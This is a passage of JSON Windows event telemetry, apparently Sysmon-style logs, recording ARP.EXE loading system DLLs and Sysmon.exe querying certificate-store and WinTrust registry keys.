"image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ARP.EXE", - "image_path": "C:\\Windows\\System32\\ARP.EXE", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573232770000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "snmpapi.dll", - "image_path": "C:\\Windows\\System32\\snmpapi.dll", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573232920000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\WINDOWS\\system32\\ARP.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\RFC1156Agent\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\RFC1156Agent\\CurrentVersion\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "registry", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\WINDOWS\\system32\\ARP.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\RFC1156Agent\\CurrentVersion\\Parameters", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\RFC1156Agent\\CurrentVersion\\Parameters\\TrapPollTimeMilliSecs", - "registry_value": "TrapPollTimeMilliSecs", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "image_load", - "image_name": "dhcpcsvc6.dll", - "image_path": "C:\\Windows\\System32\\dhcpcsvc6.dll", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "dhcpcsvc.dll", - "image_path": "C:\\Windows\\System32\\dhcpcsvc.dll", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 2080, - "process_name": "ARP.EXE", - "process_path": "C:\\Windows\\System32\\ARP.EXE", - "timestamp": 131883573233080000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B4125401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573233080000, - "unique_pid": 